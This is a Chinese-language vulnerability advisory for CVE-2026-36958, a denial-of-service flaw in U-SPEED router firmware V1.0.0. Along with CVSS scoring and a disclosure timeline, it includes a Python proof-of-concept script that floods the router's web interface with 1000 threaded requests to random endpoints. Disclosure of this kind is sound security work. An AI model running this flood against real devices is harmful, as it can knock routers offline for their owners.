CVE ID: CVE-2026-36958 日期: 2026-04-29 发现者: Kirubel Solomne 厂商: U-SPEED 产品: U-SPEED 路由器 固件版本: V1.0.0 CWE: CWE-400 - 未受控制的资源消耗
U-SPEED 路由器固件 V1.0.0 存在拒绝服务漏洞。攻击者通过向 Web 管理界面发送大量并发 HTTP 请求到随机或不存在的端点,可耗尽嵌入式 Boa HTTP 服务器中的系统资源。这会导致路由器 Web 界面无响应,可能需要手动重启才能恢复正常运行。
CVSS v3.1 评分:7.5(高危)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| 指标 | 值 |
|---|
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 无 |
| 机密性影响 | 无 |
| 完整性影响 | 无 |
| 可用性影响 | 高 |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
预期行为: 服务器应优雅地处理并发连接。 实际行为: Web 界面无响应;需要手动重启。
| 日期 | 事件 |
|---|---|
| 2026-04-29 | 发现漏洞 |
| 2026-04-29 | 报告给 MITRE |
| 2026-04-29 | 分配 CVE-2026-36958 |
| 2026-04-29 | 公开披露 |